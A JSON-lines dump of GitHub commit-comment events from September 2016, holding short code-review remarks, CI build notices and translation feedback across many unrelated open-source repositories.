{"id":"4528008255","type":"CommitCommentEvent","actor":{"login":"Yajo"},"repo":{"name":"OCA/server-tools"},"payload":{"comment":{"id":18929261,"position":41,"line":107,"path":"base_custom_info/views/custom_info_value_view.xml","commit_id":"150b55f72e87ec2da7919aa0971bc12ec633fcae","created_at":"2016-09-07T14:32:09Z","updated_at":"2016-09-07T14:32:09Z","body":"No need this time, it's a primary view. :wink: "}},"created_at":"2016-09-07T14:32:09Z"}
{"id":"4528011061","type":"CommitCommentEvent","actor":{"login":"schildbach"},"repo":{"name":"ibauersachs/dnssecjava"},"payload":{"comment":{"id":18929268,"position":13,"line":22,"path":"src/main/java/org/jitsi/dnssec/R.java","commit_id":"663beb5293e050fb97a98bb69b6ebc050fe24d3e","created_at":"2016-09-07T14:32:32Z","updated_at":"2016-09-07T14:32:32Z","body":"Maybe useNeutral bydefault? (= true)"}},"created_at":"2016-09-07T14:32:32Z"}
{"id":"4528018758","type":"CommitCommentEvent","actor":{"login":"daveFNbuck"},"repo":{"name":"spotify/luigi"},"payload":{"comment":{"id":18929288,"position":58,"line":784,"path":"test/worker_test.py","commit_id":"c76284218b64e3784654eacd18d6deceb07825b7","created_at":"2016-09-07T14:33:39Z","updated_at":"2016-09-07T14:33:39Z","body":"this is the same as `unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'signal.SIGUSR1 not found on this system')`"}},"created_at":"2016-09-07T14:33:39Z"}
{"id":"4528020358","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"luther9/bloc-jams"},"payload":{"comment":{"id":18929291,"position":42,"line":287,"path":"scripts/album.js","commit_id":"9bebe83e679d90a94b4adb7ddfd737ef2c74bd49","created_at":"2016-09-07T14:33:54Z","updated_at":"2016-09-07T14:33:54Z","body":"Good catch on the string conversion. Many students have run into the type issue here and gotten stuck."}},"created_at":"2016-09-07T14:33:54Z"}
{"id":"4528021458","type":"CommitCommentEvent","actor":{"login":"sunfmin"},"repo":{"name":"jinzhu/gorm"},"payload":{"comment":{"id":18929294,"position":9,"line":369,"path":"main.go","commit_id":"02f6ae3c4ed211472b0492cee02ff3ddfdc1830d","created_at":"2016-09-07T14:34:03Z","updated_at":"2016-09-07T14:34:03Z","body":"It don't need to select first?"}},"created_at":"2016-09-07T14:34:03Z"}
{"id":"4528027946","type":"CommitCommentEvent","actor":{"login":"daveFNbuck"},"repo":{"name":"spotify/luigi"},"payload":{"comment":{"id":18929311,"position":58,"line":784,"path":"test/worker_test.py","commit_id":"c76284218b64e3784654eacd18d6deceb07825b7","created_at":"2016-09-07T14:34:58Z","updated_at":"2016-09-07T14:34:58Z","body":"`unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'signal.SIGUSR1 not found on this system')` is probably a better way to handle this"}},"created_at":"2016-09-07T14:34:58Z"}
{"id":"4528032050","type":"CommitCommentEvent","actor":{"login":"dennisschoenmakers"},"repo":{"name":"quintel/etmoses"},"payload":{"comment":{"id":18929321,"position":null,"line":null,"path":null,"commit_id":"967b58694ef79064c6b71918ba976092543b4254","created_at":"2016-09-07T14:35:36Z","updated_at":"2016-09-07T14:35:36Z","body":":+1: 🎉 "}},"created_at":"2016-09-07T14:35:36Z"}
{"id":"4528036791","type":"CommitCommentEvent","actor":{"login":"jamflux"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18929331,"position":null,"line":null,"path":null,"commit_id":"fcb8e5c8796c2e13f8a700993a77f960376547e2","created_at":"2016-09-07T14:36:17Z","updated_at":"2016-09-07T14:36:17Z","body":"Muy bien. Gracias."}},"created_at":"2016-09-07T14:36:17Z"}
{"id":"4528037272","type":"CommitCommentEvent","actor":{"login":"behram"},"repo":{"name":"ojs/ojs"},"payload":{"comment":{"id":18929333,"position":null,"line":null,"path":null,"commit_id":"328231af18afa9771029a01ffc113682d8bd7541","created_at":"2016-09-07T14:36:20Z","updated_at":"2016-09-07T14:36:20Z","body":"I tested and dropping issues there which needs improvement.\r\n - ![image](https://cloud.githubusercontent.com/assets/4572080/18315499/eb08f134-751f-11e6-8307-921b2dae9011.png)\r\n`Institution not listed` checkbox not works now. \r\n\r\n - ![image](https://cloud.githubusercontent.com/assets/4572080/18315710/a1b993ca-7520-11e6-8d32-168b2c3ecceb.png)\r\ndetails button for author not works.\r\n\r\n - ![image](https://cloud.githubusercontent.com/assets/4572080/18315840/1d25e694-7521-11e6-9756-578b4fa7a0fb.png)\r\nsuccess message after creation must be revised.\r\n\r\n- and there is any validation i can create article without fill any input. ⚠️ "}},"created_at":"2016-09-07T14:36:20Z"}
{"id":"4528038302","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18929336,"position":null,"line":null,"path":null,"commit_id":"feb82bcc8257ac6e175bf12e8ea5c50f1008274e","created_at":"2016-09-07T14:36:28Z","updated_at":"2016-09-07T14:36:28Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 963](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12904&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T14:36:28Z"}
{"id":"4528039325","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"dagyus/Cuentas-Bancarias"},"payload":{"comment":{"id":18929337,"position":115,"line":115,"path":"Cuentas.java","commit_id":"086ab48365ec2dda36268e93589a082e6d79b99a","created_at":"2016-09-07T14:36:36Z","updated_at":"2016-09-07T14:36:36Z","body":"Muy bien con el método toString()!!!\r\nPara la próxima podrías usar StringBuilder, algo así:\r\n<code>\r\nStringBuilder builder = new StringBuilder();\r\nbuilder.append(\"Cuenta [nombre=\").append(this.getNombre()).append(\", saldo=\").append(this.getSaldo()).append(\"]\");\r\nreturn builder.toString();\r\n<code>\r\n"}},"created_at":"2016-09-07T14:36:36Z"}
{"id":"4528047271","type":"CommitCommentEvent","actor":{"login":"turicas"},"repo":{"name":"turicas/rows"},"payload":{"comment":{"id":18929350,"position":12,"line":38,"path":"tests/tests_utils.py","commit_id":"4b91c38123944e40b89f6b610c6b560d8270f918","created_at":"2016-09-07T14:37:32Z","updated_at":"2016-09-07T14:37:32Z","body":"Thanks for the suggestion."}},"created_at":"2016-09-07T14:37:32Z"}
{"id":"4528054342","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18929364,"position":12,"line":39,"path":"src/main/kotlin/org/rust/cargo/toolchain/RustToolchain.kt","commit_id":"bf34d880f0c384119e0e54d6f0b9b1b0062bdb83","created_at":"2016-09-07T14:38:22Z","updated_at":"2016-09-07T14:38:22Z","body":">Shouldn't the `RustToolchain` know whether it is managed or not?\r\n\r\nYes, it should. Moreover, I think we should control toolchain version ourselves via `RUSTUP_TOOLCHAIN` environment variable. \r\n\r\nThe idea is that the user should be able to switch toolchains from within IDE (on the project and maybe even on the run configuration level), and that we should use different standard libraries for different toolchains.\r\n\r\nThis is yet to be implemented though :) I don't think this is a tremendously pressing issue: current solution works well enough in practice (at least for me) so we can wait for rustup to become more stable."}},"created_at":"2016-09-07T14:38:22Z"}
{"id":"4528058986","type":"CommitCommentEvent","actor":{"login":"daveFNbuck"},"repo":{"name":"spotify/luigi"},"payload":{"comment":{"id":18929386,"position":105,"line":831,"path":"test/worker_test.py","commit_id":"c76284218b64e3784654eacd18d6deceb07825b7","created_at":"2016-09-07T14:39:00Z","updated_at":"2016-09-07T14:39:00Z","body":"I'm not sure what this kill is supposed to test. Wouldn't we want the worker not to run anything if we tried to kill it before/during scheduling?"}},"created_at":"2016-09-07T14:39:00Z"}
{"id":"4528064072","type":"CommitCommentEvent","actor":{"login":"sergray"},"repo":{"name":"sergray/py-timeexecution"},"payload":{"comment":{"id":18929402,"position":null,"line":null,"path":null,"commit_id":"a67f119baad23c5ae89526f4b39aaa8e8b14b892","created_at":"2016-09-07T14:39:47Z","updated_at":"2016-09-07T14:39:47Z","body":"One queue timeout does not guarantee, that the worker thread stops"}},"created_at":"2016-09-07T14:39:47Z"}
{"id":"4528066064","type":"CommitCommentEvent","actor":{"login":"kunalc101"},"repo":{"name":"kunalc101/jspTest"},"payload":{"comment":{"id":18929407,"position":null,"line":null,"path":null,"commit_id":"5c4c9f1d1fd9877aae8f1c63a8045c2894fe860d","created_at":"2016-09-07T14:40:06Z","updated_at":"2016-09-07T14:40:06Z","body":"Added the maven dependency plugin for Heroku support"}},"created_at":"2016-09-07T14:40:06Z"}
{"id":"4528067241","type":"CommitCommentEvent","actor":{"login":"FernetMenta"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18929413,"position":null,"line":null,"path":null,"commit_id":"2cb1ef00750dd07e73c18bfe1fe3f7ddae9628fb","created_at":"2016-09-07T14:40:17Z","updated_at":"2016-09-07T14:40:17Z","body":"thanks"}},"created_at":"2016-09-07T14:40:17Z"}
{"id":"4528067569","type":"CommitCommentEvent","actor":{"login":"jamflux"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18929415,"position":null,"line":null,"path":null,"commit_id":"f3516110c91a37198d0270fc590c706ce6ae3c46","created_at":"2016-09-07T14:40:20Z","updated_at":"2016-09-07T14:40:20Z","body":"Acá tratamos de evitar abreviaciones, sobretodo esta de app por aplicación...\r\nPor qué cambias? "}},"created_at":"2016-09-07T14:40:20Z"}
{"id":"4528068364","type":"CommitCommentEvent","actor":{"login":"riethm"},"repo":{"name":"softlayer/softlayer-go"},"payload":{"comment":{"id":18929416,"position":null,"line":null,"path":null,"commit_id":"29819c21d5c6a42c3cead0d3313ed0177eabf8ed","created_at":"2016-09-07T14:40:27Z","updated_at":"2016-09-07T14:40:27Z","body":"Workaround for #3 "}},"created_at":"2016-09-07T14:40:27Z"}
{"id":"4528072918","type":"CommitCommentEvent","actor":{"login":"intgr"},"repo":{"name":"pornel/mysqlcompat"},"payload":{"comment":{"id":18929431,"position":null,"line":null,"path":null,"commit_id":"6bca7f1703817e0e373eb7bc362415c7201c7cf3","created_at":"2016-09-07T14:41:08Z","updated_at":"2016-09-07T14:41:08Z","body":"You may want to link to the current maintained version instead: http://pgxn.org/dist/mysqlcompat/\r\n and https://github.com/2ndQuadrant/mysqlcompat\r\n"}},"created_at":"2016-09-07T14:41:08Z"}
{"id":"4528078139","type":"CommitCommentEvent","actor":{"login":"jamflux"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18929441,"position":null,"line":null,"path":null,"commit_id":"9ff12066ff67e2c53ceecdce86f1d2b3b24192eb","created_at":"2016-09-07T14:41:50Z","updated_at":"2016-09-07T14:41:50Z","body":"Dejarla así amigo.\r\nSaludos"}},"created_at":"2016-09-07T14:41:50Z"}
{"id":"4528079683","type":"CommitCommentEvent","actor":{"login":"MStines007"},"repo":{"name":"DataDog/dd-agent"},"payload":{"comment":{"id":18929445,"position":2,"line":1,"path":"dogstatsd.py","commit_id":"b5853e1b88de4ba38e0fd319de56a5463d89fbba","created_at":"2016-09-07T14:42:03Z","updated_at":"2016-09-07T14:42:03Z","body":"Yeah, yep. Fixed."}},"created_at":"2016-09-07T14:42:03Z"}
{"id":"4528096885","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":18929485,"position":191,"line":646,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/Exchange.java","commit_id":"cfb5fe45313ddfdcdb1e5dbc42d37762e800f557","created_at":"2016-09-07T14:44:31Z","updated_at":"2016-09-07T14:44:31Z","body":"Should we using something like correlationContext from transport layer instead of address ?"}},"created_at":"2016-09-07T14:44:31Z"}
{"id":"4528100283","type":"CommitCommentEvent","actor":{"login":"behram"},"repo":{"name":"ojs/ojs"},"payload":{"comment":{"id":18929502,"position":5,"line":168,"path":"src/Ojs/JournalBundle/Controller/ArticleSubmissionController.php","commit_id":"80eab797466da8bd9b66e29d5f6f96fa878041b9","created_at":"2016-09-07T14:45:01Z","updated_at":"2016-09-07T14:45:01Z","body":"- you must add datetime check too. If ending date smaller than current datetime, function must return now allowed response. and you can describe this issue on not allowed message. \r\n\r\n- User can specify on week after for endingDate on journal edit page. So on current week article submission must be open.\r\n\r\nAfter solved this issue i will merge this branch."}},"created_at":"2016-09-07T14:45:01Z"}
{"id":"4528100890","type":"CommitCommentEvent","actor":{"login":"geneotech"},"repo":{"name":"Kartezjan/sfml-box2d-test-engine"},"payload":{"comment":{"id":18929505,"position":80,"line":80,"path":"SFML/message_storage.h","commit_id":"5757104d25fba02b6a06a93f760509364603fe10","created_at":"2016-09-07T14:45:07Z","updated_at":"2016-09-07T14:45:07Z","body":"2. Tej samej karze podlega, kto rozpowszechnia bez podania nazwiska lub pseudonimu twórcy cudzy utwór w wersji oryginalnej albo w postaci opracowania, artystyczne wykonanie albo publicznie zniekształca taki utwór, artystyczne wykonanie, fonogram, wideogram lub nadanie. "}},"created_at":"2016-09-07T14:45:07Z"}
{"id":"4528101700","type":"CommitCommentEvent","actor":{"login":"behram"},"repo":{"name":"ojs/ojs"},"payload":{"comment":{"id":18929507,"position":14,"line":598,"path":"src/Ojs/JournalBundle/Controller/ArticleSubmissionController.php","commit_id":"80eab797466da8bd9b66e29d5f6f96fa878041b9","created_at":"2016-09-07T14:45:16Z","updated_at":"2016-09-07T14:45:16Z","body":"related comment https://github.com/ojs/ojs/commit/80eab797466da8bd9b66e29d5f6f96fa878041b9?diff=unified#commitcomment-18929502"}},"created_at":"2016-09-07T14:45:16Z"}
{"id":"4528104141","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18929512,"position":null,"line":null,"path":null,"commit_id":"feb82bcc8257ac6e175bf12e8ea5c50f1008274e","created_at":"2016-09-07T14:45:36Z","updated_at":"2016-09-07T14:45:36Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 963](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12904&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 247, ignored: 3 Build time: 00:09:07"}},"created_at":"2016-09-07T14:45:36Z"}
{"id":"4528105500","type":"CommitCommentEvent","actor":{"login":"m-2k"},"repo":{"name":"synrc/nitro"},"payload":{"comment":{"id":18929514,"position":null,"line":null,"path":null,"commit_id":"92a712aa3ab8e676d1ac5826e1a5300f99997336","created_at":"2016-09-07T14:45:47Z","updated_at":"2016-09-07T14:45:47Z","body":"How to use extended data collector (erlach example):\r\n\r\n```erlang\r\nValue = [\r\n    {Sage,     \"utf8_toByteArray(querySourceRaw('\"++Sage++\"'))\"},\r\n    {Input,    \"utf8_toByteArray(qi('\"++Input++\"').innerText)\"},\r\n    {Selector, \"utf8_toByteArray(querySourceRaw('\"++Selector++\"'))\"}\r\n],\r\nwf:wire(#event{type=click,\r\n    target=Store,\r\n    postback=#add{target=Target,forms=Forms},\r\n    source=Value,\r\n    validation=\"this.setAttribute('disabled','disabled');\"}),\r\n```"}},"created_at":"2016-09-07T14:45:47Z"}
{"id":"4528107775","type":"CommitCommentEvent","actor":{"login":"mbochenk"},"repo":{"name":"mysql/mysql-server"},"payload":{"comment":{"id":18929521,"position":5,"line":283,"path":"support-files/mysql.server.sh","commit_id":"684a165f28b3718160a3e4c5ebd18a465d85e97c","created_at":"2016-09-07T14:46:09Z","updated_at":"2016-09-07T14:46:09Z","body":"Any idea why was this done? Looks like we are just starting in background instead of redirecting output."}},"created_at":"2016-09-07T14:46:09Z"}
{"id":"4528108942","type":"CommitCommentEvent","actor":{"login":"permcody"},"repo":{"name":"idaholab/moose"},"payload":{"comment":{"id":18929523,"position":13,"line":13,"path":"modules/porous_flow/tests/dispersion/tests","commit_id":"73dec616af85f874356a8efe1964ad6913404504","created_at":"2016-09-07T14:46:19Z","updated_at":"2016-09-07T14:46:19Z","body":"@cpgr - This test is breaking on our heavy testing target. Can you review this test and see if you can fix. BTW you can trigger heavy testing for any PR. Just click on the event in CIVET and check additional targets you'd like to run. It can be tricky to get 100 time steps to line up perfectly on tests like these."}},"created_at":"2016-09-07T14:46:19Z"}
{"id":"4528112305","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18929529,"position":103,"line":101,"path":"plugins/CuraProfileReader/CuraProfileReader.py","commit_id":"86369ce1da14b91deb28ddc32d8cbdc1aab28b96","created_at":"2016-09-07T14:46:47Z","updated_at":"2016-09-07T14:46:47Z","body":"This performs only one upgrade step. It would work when importing a 2.1 file into 2.3, but it won't work when importing a 2.1 file into 2.4."}},"created_at":"2016-09-07T14:46:47Z"}
{"id":"4528113047","type":"CommitCommentEvent","actor":{"login":"lanseb"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":18929534,"position":null,"line":null,"path":null,"commit_id":"9bc025708ebaf28e4fb6292f9335c456e4fd5130","created_at":"2016-09-07T14:46:53Z","updated_at":"2016-09-07T14:46:53Z","body":"There are still bugs in this code.\r\n\r\nhttp://tinyurl.com/flux-img01\r\nhttp://tinyurl.com/flux-img02"}},"created_at":"2016-09-07T14:46:53Z"}
{"id":"4528120551","type":"CommitCommentEvent","actor":{"login":"ZedCee"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18929548,"position":null,"line":null,"path":null,"commit_id":"efdb188eb154f87293e302044270cb33260c046d","created_at":"2016-09-07T14:48:00Z","updated_at":"2016-09-07T14:48:00Z","body":"*sigh*\r\nI wish I could help test this stuff"}},"created_at":"2016-09-07T14:48:00Z"}
{"id":"4528127220","type":"CommitCommentEvent","actor":{"login":"AndrewIngram"},"repo":{"name":"threepointone/glamor"},"payload":{"comment":{"id":18929566,"position":5,"line":315,"path":"src/index.js","commit_id":"c771e0605998d7e8c53eb3b881597c02b57e6c57","created_at":"2016-09-07T14:49:00Z","updated_at":"2016-09-07T14:49:00Z","body":"Object.entries isn't well-supported. This line broke my project."}},"created_at":"2016-09-07T14:49:00Z"}
{"id":"4528127313","type":"CommitCommentEvent","actor":{"login":"fkoester"},"repo":{"name":"bringnow/react-native"},"payload":{"comment":{"id":18929567,"position":null,"line":null,"path":null,"commit_id":"c8092220dfe7da2c417688969e83097ecfc0e2aa","created_at":"2016-09-07T14:49:01Z","updated_at":"2016-09-07T14:49:01Z","body":"@gotev Thanks for the hint! Renamed it."}},"created_at":"2016-09-07T14:49:01Z"}
{"id":"4528130110","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18929574,"position":8,"line":32,"path":"plugins/CuraProfileReader/CuraProfileReader.py","commit_id":"d7d18043196734ae98da57ea24033b34cd485765","created_at":"2016-09-07T14:49:26Z","updated_at":"2016-09-07T14:49:26Z","body":"Opening a file that isn't a zipfile doesn't seem to give a specific exception when I tried it though. "}},"created_at":"2016-09-07T14:49:26Z"}
{"id":"4528131610","type":"CommitCommentEvent","actor":{"login":"spike11302000"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":18929583,"position":null,"line":null,"path":null,"commit_id":"cf9be5f167c092fcf867af56a37e2a51b417ae38","created_at":"2016-09-07T14:49:39Z","updated_at":"2016-09-07T14:49:39Z","body":"going to add decaying/growing grass next\r\n"}},"created_at":"2016-09-07T14:49:39Z"}
{"id":"4528135513","type":"CommitCommentEvent","actor":{"login":"mwim"},"repo":{"name":"NormalityBytes/strandkorb"},"payload":{"comment":{"id":18929597,"position":null,"line":null,"path":null,"commit_id":"6e1ce365fcb3662cf3e420c8feacaabdac0dbb0b","created_at":"2016-09-07T14:50:15Z","updated_at":"2016-09-07T14:50:15Z","body":"Tabelle, inputfelder und button in vermieter.xhtml auf bootstrap umgestellt. Methoden zum updaten und löschen von Strandkörben in beans hinzugefügt. Update und delete in vermieter.xhtml umgesetzt. Path zu glyphicons in bootstrap angepasst."}},"created_at":"2016-09-07T14:50:15Z"}
{"id":"4528137927","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18929602,"position":null,"line":null,"path":null,"commit_id":"efdb188eb154f87293e302044270cb33260c046d","created_at":"2016-09-07T14:50:35Z","updated_at":"2016-09-07T14:50:35Z","body":"@ZedCee better get an Android :P"}},"created_at":"2016-09-07T14:50:35Z"}
{"id":"4528145104","type":"CommitCommentEvent","actor":{"login":"Alkallid"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18929617,"position":null,"line":null,"path":null,"commit_id":"71f4105a37f73968fe18cd4b63f49d62b723aad0","created_at":"2016-09-07T14:51:36Z","updated_at":"2016-09-07T14:51:36Z","body":"They do. It's just a long, one-frame projectile held for all frames of a second."}},"created_at":"2016-09-07T14:51:36Z"}
{"id":"4528150921","type":"CommitCommentEvent","actor":{"login":"ZedCee"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18929634,"position":null,"line":null,"path":null,"commit_id":"e67d863a0adafbb71253a7853229c23f93652822","created_at":"2016-09-07T14:52:25Z","updated_at":"2016-09-07T14:52:25Z","body":"@PeratX Even if you run out of time, it wouldn't hurt to leave it open and see if another may want to take a stab at it.   Put some project guidelines in the README.\r\n\r\nGlad to see you're still working at it."}},"created_at":"2016-09-07T14:52:25Z"}
{"id":"4528153192","type":"CommitCommentEvent","actor":{"login":"Pabloandumundu"},"repo":{"name":"Pabloandumundu/autojqm"},"payload":{"comment":{"id":18929643,"position":11,"line":10,"path":"README.md","commit_id":"6a0e8d1fbc611e18bdc9bdf4991a39ab5e000eb3","created_at":"2016-09-07T14:52:42Z","updated_at":"2016-09-07T14:52:42Z","body":"rwerwrwewr"}},"created_at":"2016-09-07T14:52:42Z"}
{"id":"4528155037","type":"CommitCommentEvent","actor":{"login":"IgnusG"},"repo":{"name":"metjus/Calculator"},"payload":{"comment":{"id":18929648,"position":8,"line":8,"path":"script.js","commit_id":"8b596fc5c23239c879266b59d51a63fb284bacf6","created_at":"2016-09-07T14:52:59Z","updated_at":"2016-09-07T14:52:59Z","body":"Don't use functions like this. Pass x as a parameter to the function.\r\n```javascript\r\nfunction result(x){\r\n```"}},"created_at":"2016-09-07T14:52:59Z"}
{"id":"4528155926","type":"CommitCommentEvent","actor":{"login":"Pabloandumundu"},"repo":{"name":"Pabloandumundu/autojqm"},"payload":{"comment":{"id":18929651,"position":null,"line":null,"path":null,"commit_id":"6a0e8d1fbc611e18bdc9bdf4991a39ab5e000eb3","created_at":"2016-09-07T14:53:08Z","updated_at":"2016-09-07T14:53:08Z","body":"probannnn"}},"created_at":"2016-09-07T14:53:08Z"}
{"id":"4528161863","type":"CommitCommentEvent","actor":{"login":"pulkitsinghal"},"repo":{"name":"ShoppinPal/warehouse"},"payload":{"comment":{"id":18929661,"position":74,"line":180,"path":"common/models/report-model.js","commit_id":"6e5d8c6ca0d5412143b3c3697708139e6d8424a8","created_at":"2016-09-07T14:53:58Z","updated_at":"2016-09-07T14:53:58Z","body":"@ysg410 - now that i think about it (a year later) ... it would be good to not run the remaining code if the total number of rows coming from the input is zero ... simply return early with `return cb(null);`"}},"created_at":"2016-09-07T14:53:58Z"}
{"id":"4528162833","type":"CommitCommentEvent","actor":{"login":"pulkitsinghal"},"repo":{"name":"ShoppinPal/warehouse"},"payload":{"comment":{"id":18929669,"position":109,"line":215,"path":"common/models/report-model.js","commit_id":"6e5d8c6ca0d5412143b3c3697708139e6d8424a8","created_at":"2016-09-07T14:54:07Z","updated_at":"2016-09-07T14:54:07Z","body":"wow this is bad of me!"}},"created_at":"2016-09-07T14:54:07Z"}
{"id":"4528164029","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"SirVer/ultisnips"},"payload":{"comment":{"id":18929673,"position":null,"line":null,"path":null,"commit_id":"7549874758117f31609550c4fc60fe9497f12068","created_at":"2016-09-07T14:54:19Z","updated_at":"2016-09-07T14:54:19Z","body":"btw: you might be interested in https://github.com/tweekmonster/vim-testbed."}},"created_at":"2016-09-07T14:54:19Z"}
{"id":"4528166226","type":"CommitCommentEvent","actor":{"login":"IgnusG"},"repo":{"name":"metjus/Calculator"},"payload":{"comment":{"id":18929678,"position":30,"line":30,"path":"script.js","commit_id":"8b596fc5c23239c879266b59d51a63fb284bacf6","created_at":"2016-09-07T14:54:36Z","updated_at":"2016-09-07T14:54:36Z","body":"Use function `result(0)`"}},"created_at":"2016-09-07T14:54:36Z"}
{"id":"4528167848","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18929685,"position":null,"line":null,"path":null,"commit_id":"e48faa9f9671a2755851abdf0614164ab74dd1e0","created_at":"2016-09-07T14:54:51Z","updated_at":"2016-09-07T14:54:51Z","body":"++"}},"created_at":"2016-09-07T14:54:51Z"}
{"id":"4528168779","type":"CommitCommentEvent","actor":{"login":"gbcwbz"},"repo":{"name":"RT-Thread/rt-thread"},"payload":{"comment":{"id":18929689,"position":242,"line":354,"path":"components/finsh/cmd.c","commit_id":"45c7f030359df714f0f088a16e87d19bdea99fa0","created_at":"2016-09-07T14:54:59Z","updated_at":"2016-09-07T14:54:59Z","body":"maxlen < strlen(\"msgqueue\") 的时候会导致下面的数据和标题不对齐"}},"created_at":"2016-09-07T14:54:59Z"}
{"id":"4528170073","type":"CommitCommentEvent","actor":{"login":"IgnusG"},"repo":{"name":"metjus/Calculator"},"payload":{"comment":{"id":18929695,"position":27,"line":27,"path":"script.js","commit_id":"8b596fc5c23239c879266b59d51a63fb284bacf6","created_at":"2016-09-07T14:55:13Z","updated_at":"2016-09-07T14:55:13Z","body":"Improve function naming. No idea what `ac` means"}},"created_at":"2016-09-07T14:55:13Z"}
{"id":"4528173591","type":"CommitCommentEvent","actor":{"login":"Infante007"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18929705,"position":null,"line":null,"path":null,"commit_id":"f3516110c91a37198d0270fc590c706ce6ae3c46","created_at":"2016-09-07T14:55:43Z","updated_at":"2016-09-07T14:55:43Z","body":"Listo arreglado"}},"created_at":"2016-09-07T14:55:43Z"}
{"id":"4528175917","type":"CommitCommentEvent","actor":{"login":"ZedCee"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18929710,"position":null,"line":null,"path":null,"commit_id":"e1f9b947990f0584d4173542c7d2774964a95588","created_at":"2016-09-07T14:56:03Z","updated_at":"2016-09-07T14:56:03Z","body":"Very frequently there are issues caused by plugins(outdated or following the wrong api), I recommend to move your plugin folder and if that fixes the issue, then incrementally install them back a few at a time to narrow down the problem plugin."}},"created_at":"2016-09-07T14:56:03Z"}
{"id":"4528176494","type":"CommitCommentEvent","actor":{"login":"IgnusG"},"repo":{"name":"metjus/Calculator"},"payload":{"comment":{"id":18929712,"position":33,"line":33,"path":"script.js","commit_id":"8b596fc5c23239c879266b59d51a63fb284bacf6","created_at":"2016-09-07T14:56:09Z","updated_at":"2016-09-07T14:56:09Z","body":"What are you trying to do with `n1`?"}},"created_at":"2016-09-07T14:56:09Z"}
{"id":"4528180589","type":"CommitCommentEvent","actor":{"login":"IgnusG"},"repo":{"name":"metjus/Calculator"},"payload":{"comment":{"id":18929723,"position":1,"line":1,"path":"script.js","commit_id":"8b596fc5c23239c879266b59d51a63fb284bacf6","created_at":"2016-09-07T14:56:41Z","updated_at":"2016-09-07T14:56:41Z","body":"Don't use global variables if you can prevent it ;)"}},"created_at":"2016-09-07T14:56:41Z"}
{"id":"4528181343","type":"CommitCommentEvent","actor":{"login":"johnnyoshika"},"repo":{"name":"dmitrynogin/RestClients"},"payload":{"comment":{"id":18929726,"position":null,"line":null,"path":null,"commit_id":"4b8e03fc3f7c848725371dee9f69d962995bd29b","created_at":"2016-09-07T14:56:48Z","updated_at":"2016-09-07T14:56:48Z","body":"Thank you!  :-)"}},"created_at":"2016-09-07T14:56:48Z"}
{"id":"4528182148","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18929729,"position":null,"line":null,"path":null,"commit_id":"e1f9b947990f0584d4173542c7d2774964a95588","created_at":"2016-09-07T14:56:55Z","updated_at":"2016-09-07T14:56:55Z","body":"This is not a support forum. If you have an issue, bring it to the chat instead of spamming irrelevant comments on commits."}},"created_at":"2016-09-07T14:56:55Z"}
{"id":"4528185418","type":"CommitCommentEvent","actor":{"login":"xdevelnet"},"repo":{"name":"xdevelnet/temp"},"payload":{"comment":{"id":18929737,"position":157,"line":278,"path":"ore_growth_original_utf8.txt","commit_id":"25faeae07b5dc9a1c9aaba9a3eeaa98cfcc40cdf","created_at":"2016-09-07T14:57:25Z","updated_at":"2016-09-07T14:57:25Z","body":"Тавтология \"его ... его\""}},"created_at":"2016-09-07T14:57:25Z"}
{"id":"4528194644","type":"CommitCommentEvent","actor":{"login":"shulard"},"repo":{"name":"shulard/atoum-xml-extension"},"payload":{"comment":{"id":18929756,"position":11,"line":110,"path":"classes/asserters/nodes.php","commit_id":"ef0c35c6091aa6f85b27d1bb1ca7e6182f9aafbf","created_at":"2016-09-07T14:58:41Z","updated_at":"2016-09-07T14:58:41Z","body":"Wow thanks for the tips, much cleaner than object property 👍 "}},"created_at":"2016-09-07T14:58:41Z"}
